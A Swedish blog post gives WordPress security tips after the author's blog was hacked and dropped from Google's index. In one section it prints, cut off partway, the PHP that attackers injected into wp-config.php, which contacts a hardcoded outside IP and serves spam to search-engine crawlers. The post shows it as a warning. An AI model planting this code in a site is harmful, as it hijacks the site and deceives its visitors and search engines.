• Tweet

• PUSHA

• Tweet

Häromdagen blev min engelska WordPress-blogg hackad. Det skapades en mängd undersidor och mina vanliga inlägg redirectades till direkta Spam-sidor. Eftersom jag inte uppdaterat bloggen på länge upptäckte jag inte när det hände – men resultatet lät inte vänta på sig: Min blogg blev bortplockad från Googles index!

Även om mycket är perfekt med WordPress ser vi nu att många hackare tagit sig in på SEO-spåret. De vill utan din vetskap hacka sig in på din blogg och på så sätt förstöra allt det jobb du lagt ner.

Så när vi pratar SEO nu så handlar det i hög utsträckning om att skydda sig mot dessa hackare. Givetvis borde jag ha haft mycket bättre koll på min blogg så den inte blev hackad – jag var slarvig. Men man lär sig av sina misstag – så därför handlar min femte del i WordPress SEO-guiden hos Binero just om att skydda sig, så ni inte råkar ut för det jag gjorde.

Tidigare: 1) SEO från början, 2) Tekniska tips, 3) Gratisverktyg 1, 4) Gratisverktyg 2, 5) Skriva för Google, 6) Länkbete, 7) WordPress 1, 8 ) WordPress 2, 9) WordPress 3, 10) WordPress 4

Så skyddar du din blogg mot hackare och spammare

1. Välj bra lösenord.

Ett bra tips är att använda sig av olika lösenord på ditt Binero-konto på din blogg. En bra regel är att ha tre olika användarnamn och lösenord:

1. Unikt användarnamn och lösenord för inläggning på webbhotellet
2. Unikt användarnamn och lösenord för inlogg på /wp-admin/
3. Unikt användarnamn och lösenord för din WordPress-databas.

Hackare har nämligen en tendens att ta sig in lite överallt och får de tillgång till ditt Binero-konto kan de snabbt smyga in och ändra i dina databaser och FTP.

Hackare har förfinat det här vilket gör att de på vissa amerikanske webhosting-firmor automatiserat allt det här via script. Det räcker således att de har tillgång till ditt login och lösenord på ditt webbhotell för att de ska ställa till med stor skada.

Vi ser det inte än i Sverige, men med tanke på hur duktiga de har blivit kan det mycket väl hända här i Sverige. Så se till att ha bra lösenord (med siffror och unika tecken som ?!&)

2. Installera WP-DBManager

Se till att installera WP DB Manager som optimerar och regelbundet gör backup på din databas. Du kan välja hur ofta du vill att de ska göra backup på din databas.

 

 

 

 

 

 

 

 

 

 

Du kan manuellt plocka ned hela databasen via pluginet men även välja att få det skickat till dig. Som standard rekommenderar jag att du kör en veckovis backup, men uppdaterar du din blogg väldigt ofta kan det även vara läge med en daglig backup.

3. Se över skrivrättigheterna på din FTP

Se till att inte ha allt för vänliga skrivrättigheter på din FTP. Några saker som är bra med WordPress är att det tillåter att vissa filer är skrivbara.

Som regel bör du se till att skydda viktiga filer i roten samt /wp-admin/ och /wp-includes/ från att vara skrivbara.

4. Håll koll på följande filer extra mycket

wp-config.php

Det var här som hackarna smög in följande kod på min engelska blogg:

error_reporting(0);$sd=”";$pts=explode(“?”,$_SERVER['REQUEST_URI']);$pt=$pts[0];$d1=”212.117.169.139″;$f1=”/allmykey4.txt”;$fp1=fsockopen($d1,80,$erno,$erstr,30);if(!$fp1){print “Err: $erstr [$erno]“;}else{fwrite($fp1,”GET $f1 HTTP/1.0\r\n”);fwrite($fp1,”Host: $d1\r\n\r\n”);while(!feof($fp1)){$h1.=fread($fp1,512);}fclose($fp1);}preg_match_all(“!([^<]+)!”,$h1,$m1);$rkk=$m1[1][rand(0,count($m1[0])-1)];$rk=explode(“@”,$rkk);$rd=$rk[0];$rp=$rk[1];$a=$_SERVER['HTTP_USER_AGENT'];$ra=$_SERVER['HTTP_REFERER'];if(eregi(“google”,$a)||eregi(“Googlebot”,$a)||eregi(“slurp”,$a)||eregi(“msnbot”,$a)||eregi(“google.”,$ra)||eregi(“yahoo.”,$ra)||eregi(“live.”,$ra)||eregi(“msn.”,$ra)||eregi(“bing.”,$ra)){$d4=$rd;if(!eregi(“/news”,$pt)){$f4=”/news”.$pt;$f4=str_replace($sd,”",$f4);}else{$f4=str_replace($sd,”",$pt);}$fp4=fsockopen($d4,80,$erno,$erstr,30);if(!$fp4){print “Err: $erstr [$erno]“;}else{fwrite($fp4,”GET $f4 HTTP/1.0\r\n”);fwrite($fp4,”Host: $d4\r\n\r\n”);while(!feof($fp4)){$h4.=fread($fp4,512);}fclose($fp4);}$bo=”";$h4=str_replace(”,$bo,$h4);if(eregi(“<h1>Page not found, 404 error</h1>”,$h4)){$ru=”/”.$sd.$rp;header(“HTTP/1.1 301″);header(“Location: $ru”);exit();}else{$x4=explode(“\r\n”,$h4);for($m=9;$m

Lurigt som tusan så håll koll på din wp.config-fil!

.htaccess
Här sker all redirects för din blogg vilket gör att en smart person kan smyga in kod där vilket inte alltid är trevligt. Varenda gång du uppdaterar din blogg via FTP håll koll på när den här filen senast uppdaterades.

5. Ställ in din robots.txt för att förhindra robotar

Genom att ställa in i din robots.txt kan göra så att robotar och spindlar förhindras att komma åt vissa delar av din sajt. Robots.txt bör ligga in roten av din HTML och ett förslag är att den ser ut så här:

User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-content/
Disallow: /wp-admin/
Disallow: /wp-includes/

6. Uppdatera alltid WordPress

Hackare är duktiga på att utnyttja säkerhetshål och jag är övertygad om att de kommer hitta hål i nuvarande WP-versioner.

Kolla upp vilken version av WordPress du sitter på och se alltid till att uppgradera till nya stabila versioner. Kan låta väldigt enkelt och självklart men har du många sajter är det ofta att man glömmer av det – så även för mig.

7. Använd AskApache Password Plugin

AskApache Password plugin gör ingenting direkt med WordPress, istället skapar det multipla lager av säkerhet för din sajt eller blogg.

I princip skapar den virtuell vägg runt din blogg som stoppar attacker innan  ens når din blogg. Dessutom blockerar den en hel del spam från att komma fram till din blogg vilket gör att du sparare minne, CPU och mycket mer.

Det finns en stor mängd konfigurationsmöjligheter du kan göra med detta pluggen – har du frågor kring detta så ställ det i kommentarerna nedan.

8. Använd Secure WordPress plugin

Secure WordPress plugin gör flera saker som exempelvis:

1. removes error-information on login-page
2. adds index.php plugin-directory (virtual)
3. removes the wp-version, except in admin-area
4. removes Really Simple Discovery
5. removes Windows Live Writer
6. remove core update information for non-admins
7. remove plugin-update information for non-admins
8. remove theme-update informationfor non-admins (only WP 2.8 and higher)
9. hide wp-version in backend-dashboard for non-admins
10. remove version on urls from scripts and stylesheets onyl on frontend
11. Block bad queries

Som du kan se under punkt 3 så förhindrar den att visa vilken WordPress-version du sitter på. Vissa versioner av WordPress är mindre säkra än andra och att öppet berätta vilken version du sitter på gör det lättare för hackade att just utnyttja detta.

9. Min sajt är borta från Googles index eftersom den blivit hackad. Hur gör jag?

Det bästa sättet när du vet att din blogg blivit hackad är att plocka den offline innan du vet vad som har hänt. När allt är fixat (Ja, allt!) kan du begära det som kallas “Request  reconsideration” via Google Webmaster Tools.

Du behöver inte vara orolig – Google är väldigt snabba på att se till att din blogg återigen blir synlig.

 

 

 

 

 

 

 

 

 

 

Jag kommer personligen implementera samtliga följande åtgärder för mina bloggar framöver. Förhoppningsvis gör det mitt och även ditt bloggande lite mer säkert och vi slipper båda lägga timmar på att felsöka vad som har hänt.

Finns det någon viktig säkerhetsåtgärd jag missat? Tipsa gärna härnedan!